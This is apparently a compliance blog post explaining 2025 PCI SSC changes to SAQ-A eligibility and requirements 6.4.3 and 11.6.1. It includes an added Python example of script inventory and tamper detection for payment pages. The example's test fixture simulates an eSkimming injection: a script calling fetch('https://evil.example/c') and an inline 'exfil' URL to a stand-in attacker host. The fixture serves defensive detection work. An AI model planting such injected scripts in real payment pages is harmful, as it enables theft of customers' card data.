The PCI Security Standards Council (PCI SSC) has introduced significant updates to the Self-Assessment Questionnaire A (SAQ-A), which take effect as of March 31, 2025. These changes impact merchant eligibility requirements and compliance obligations, sparking discussions within the PCI community about what this means for merchants, Service Providers (SPs), and Qualified Security Assessors (QSAs).
Overview of the Changes
The latest update to SAQ-A involves adjustments to the compliance requirements for e-commerce businesses that outsource cardholder data processing. Specifically:
- Removal of Explicit Requirements:
- PCI DSS requirements 6.4.3 and 11.6.1 are no longer explicitly required for SAQ-A merchants. Requirement 6.4.3 mandates that every script loaded and executed in the consumer's browser on a payment page be inventoried, authorized, justified, and integrity-assured; 11.6.1 mandates a change- and tamper-detection mechanism that alerts on unauthorized modification of the HTTP headers and script contents of payment pages as received by the browser, evaluated at least weekly (or at a frequency set by the merchant's targeted risk analysis).
- Requirement 12.3.1 for conducting a Targeted Risk Analysis to support Requirement 11.6.1 has also been removed.
- New Eligibility Criteria:
- Merchants must now confirm that their entire e-commerce site (not just the payment page) is secure and not vulnerable to attacks from malicious scripts, including first-party, third-party, and external scripts that could compromise e-commerce systems.
- This is a broad, outcome-based obligation: the merchant must attest to protection against eSkimming and similar threats across the whole site, without the prescriptive steps of 6.4.3 and 11.6.1 to define what adequate protection looks like.
- Two SAQ-A Versions:
- The PCI SSC has released two versions of SAQ-A:
- The version published in October 2024, which will remain valid until March 31, 2025.
- A new version, published in January 2025, which reflects these updates and becomes mandatory on March 31, 2025.
“If a merchant is planning to continue using SAQ A in the future, they will now need to ensure that the way they protect against script-originated attacks covers the whole site and not just the payment page. If they can’t do this, they won’t meet the new eligibility criteria, and so they’ll likely need to complete SAQ A-EP instead. This would be a huge uplift, going from 27 applicable requirements in future SAQ A, up to 151 requirements and sub-requirements in SAQ A-EP.” – Gareth Bowker (Jscrambler)
What Has Changed and Why It Matters
While removing explicit requirements 6.4.3 and 11.6.1 may seem like a relaxation, the underlying security expectations remain stringent. Merchants eligible for SAQ-A must still implement robust eSkimming protections and script controls to meet the new eligibility criteria.
Key points include:
- Eligibility Is Limited: Only a subset of merchants qualify for SAQ-A, namely those who fully outsource all cardholder data functions (e.g., e-commerce merchants whose payment pages are delivered entirely by PCI DSS compliant third-party service providers). Most merchants at Levels 1, 2 and 3, and most Level 4 merchants, must still fully comply with 6.4.3 and 11.6.1.
- Circular Compliance Challenge: Although 6.4.3 and 11.6.1 are no longer explicitly required for SAQ-A, merchants need script inventory, monitoring, and controls to meet the new eligibility requirement of securing their site from vulnerabilities. This effectively necessitates adherence to the principles of these requirements, even in their absence.
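To make concrete what the "inventory, monitoring, and controls" of 6.4.3 and 11.6.1 amount to in practice (and why an SAQ-A merchant cannot credibly attest to the new eligibility criterion without something like them), here is an added example of a minimal script-inventory and tamper-detection check. It is not code from the PCI SSC, from any vendor named on this page, or from the original article; the hostnames (pay.example.com, cdn.example.net, evil.example), the HTML, the headers, and the helper names (build_inventory, check_snapshot) are all constructed for illustration. It models 6.4.3 as an inventory of authorized scripts, each with a justification and a content hash, and 11.6.1 as a periodic comparison of a fresh page snapshot (scripts plus selected HTTP headers) against that inventory.

```python
"""Script inventory (6.4.3) and change/tamper detection (11.6.1), illustrative only.
Added example; hostnames, HTML, headers and inventory below are constructed."""
import hashlib
from html.parser import HTMLParser


class ScriptCollector(HTMLParser):
    """Collects <script> elements: external ones by src, inline ones by body."""

    def __init__(self):
        super().__init__()
        self.scripts = []      # list of (src or None, inline text)
        self._active = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._active = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._active:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._active:
            self.scripts.append((self._src, "".join(self._buf).strip()))
            self._active = False


def sha256(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


# Headers whose unauthorized change 11.6.1 is meant to surface; an assumed,
# deliberately short list. Header names are assumed already canonicalised.
WATCHED_HEADERS = ("Content-Security-Policy", "Strict-Transport-Security")


def script_hashes(snapshot):
    """Map each script on the page to a content hash. External scripts are
    keyed by src and hashed from snapshot["external"] (the bodies a fetch of
    each src returned, supplied inline here so the example runs offline);
    inline scripts are keyed by their position on the page."""
    parser = ScriptCollector()
    parser.feed(snapshot["html"])
    hashes, inline_n = {}, 0
    for src, text in parser.scripts:
        if src:
            hashes[src] = sha256(snapshot["external"].get(src, ""))
        else:
            hashes[f"inline#{inline_n}"] = sha256(text)
            inline_n += 1
    return hashes


def build_inventory(snapshot, justifications):
    """6.4.3: every script gets a written justification and an integrity hash.
    A script with no justification is rejected rather than silently approved."""
    inventory = {}
    for key, digest in script_hashes(snapshot).items():
        if key not in justifications:
            raise ValueError(f"script {key} present on page but not justified")
        inventory[key] = {"sha256": digest, "justification": justifications[key]}
    return inventory


def check_snapshot(snapshot, inventory, expected_headers):
    """11.6.1-style detection: compare a fresh snapshot with the authorized
    inventory and the expected security headers; return a list of findings."""
    findings = []
    current = script_hashes(snapshot)
    for key, digest in current.items():
        if key not in inventory:
            findings.append(f"unauthorized script: {key}")
        elif digest != inventory[key]["sha256"]:
            findings.append(f"modified script: {key}")
    for key in inventory:
        if key not in current:
            findings.append(f"missing script: {key}")
    for name in WATCHED_HEADERS:
        if expected_headers.get(name) != snapshot["headers"].get(name):
            findings.append(f"header changed: {name}")
    return findings


# Constructed baseline: one PSP-hosted loader, one inline config, CSP and HSTS set.
BASELINE = {
    "html": '<html><head>\n<script src="https://pay.example.com/checkout.js"></script>\n'
            '<script>window.cfg = {"merchant": "demo"};</script>\n'
            '</head><body><form id="card"></form></body></html>',
    "headers": {"Content-Security-Policy": "script-src 'self' https://pay.example.com",
                "Strict-Transport-Security": "max-age=31536000"},
    "external": {"https://pay.example.com/checkout.js": "function tokenize(){}"},
}
JUSTIFICATIONS = {"https://pay.example.com/checkout.js": "PSP hosted-field loader",
                  "inline#0": "merchant configuration object"}
INVENTORY = build_inventory(BASELINE, JUSTIFICATIONS)

# Constructed later snapshot: inline config edited, a third-party script
# injected before </head>, and the CSP header gone from the response.
TAMPERED = {
    "html": BASELINE["html"]
        .replace('{"merchant": "demo"}', '{"merchant": "demo", "exfil": "https://evil.example/c"}')
        .replace("</head>", '<script src="https://cdn.example.net/analytics.js"></script></head>'),
    "headers": {"Strict-Transport-Security": "max-age=31536000"},
    "external": {"https://pay.example.com/checkout.js": "function tokenize(){}",
                 "https://cdn.example.net/analytics.js": "fetch('https://evil.example/c')"},
}

if __name__ == "__main__":
    print("baseline:", check_snapshot(BASELINE, INVENTORY, BASELINE["headers"]))
    print("tampered:", check_snapshot(TAMPERED, INVENTORY, BASELINE["headers"]))
```

Run against the baseline the check returns no findings; against the tampered snapshot it reports the modified inline script, the unauthorized analytics.js, and the dropped Content-Security-Policy header. Keying inline scripts by position is a simplification: reordering inline blocks would be flagged as a change, which is the safer failure mode for a payment page. A real deployment would fetch the page and each script src the way a browser would (11.6.1 is about what the browser receives), store the inventory outside the web root so an attacker who can edit the page cannot also edit the baseline, and run on a schedule no less often than weekly.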
What Hasn’t Changed
- Compliance Deadlines Remain Unchanged:
- The date on which the future-dated requirements of PCI DSS v4.0.1, including 6.4.3 and 11.6.1, become mandatory remains March 31, 2025. This applies to all merchants not eligible for SAQ-A.
- No Changes for Service Providers:
- SPs must continue to comply with 6.4.3 and 11.6.1, ensuring script inventory, monitoring, and the security of payment flows.
- SAQ-A Merchants Still Need Robust Protections:
- While the compliance process may appear simplified, the expectation of preventing vulnerabilities (e.g., skimming attacks) remains.
Implications for Stakeholders
For SAQ-A Merchants
- Eligibility Challenges:
- To qualify for SAQ-A, merchants must confirm their site is not vulnerable to script-based attacks. Merchants cannot meet this eligibility requirement without proper script controls and monitoring.
- Merchants unable to meet these criteria must switch to other Self-Assessment Questionnaires (SAQs) that require full compliance with 6.4.3 and 11.6.1, most likely SAQ A-EP.
- Security Remains Key:
- The removal of explicit requirements does not eliminate the obligation to secure e-commerce systems. Robust eSkimming protections are essential to safeguard customer data and maintain compliance.
For Service Providers
- Support Your Merchants:
- Educate small merchants about the importance of script controls and guide them toward solutions that meet compliance requirements.
- Small merchant clients may misinterpret these updates as a relaxation of obligations, leaving them vulnerable to attacks. Use this opportunity to position yourself as a trusted partner by offering low-burden, cost-effective solutions.
- Expand Your Offerings:
- Generate additional revenue by introducing value-added services that simplify compliance for merchants while enhancing their security posture.
For QSAs
- Educate and Clarify:
- Merchants may mistakenly believe that the removal of 6.4.3 and 11.6.1 means fewer security obligations. QSAs must emphasize that the expectation to secure e-commerce environments remains even though explicit requirements have been removed.
- Provide Actionable Solutions:
- Recommend proven tools, such as Human Security, Source Defense’s platform or Jscrambler, to help merchants implement the necessary eSkimming controls and achieve compliance seamlessly.
- Address FAQ-1331 Concerns:
- Clarify that Level 1 merchants cannot misuse the updated SAQ-A to bypass compliance with 6.4.3 and 11.6.1. The circular compliance logic ensures that eSkimming protections are required even for SAQ-A eligibility.
Summary of Key Takeaways
- Opportunities for Collaboration: Service Providers and QSAs can be vital in guiding merchants through these changes and implementing effective solutions.
- Changes to SAQ-A: The removal of explicit requirements 6.4.3 and 11.6.1 applies only to a small subset of merchants who meet strict SAQ-A eligibility criteria.
- Security Expectations Remain: SAQ-A merchants must implement robust protections against script-based vulnerabilities.
- Deadline Remains Firm: All merchants must comply with PCI DSS v4.0.1 by March 31, 2025.
The full article is available on the PCI Council website.
Original post title: Important Updates to SAQ-A Merchant Compliance Requirements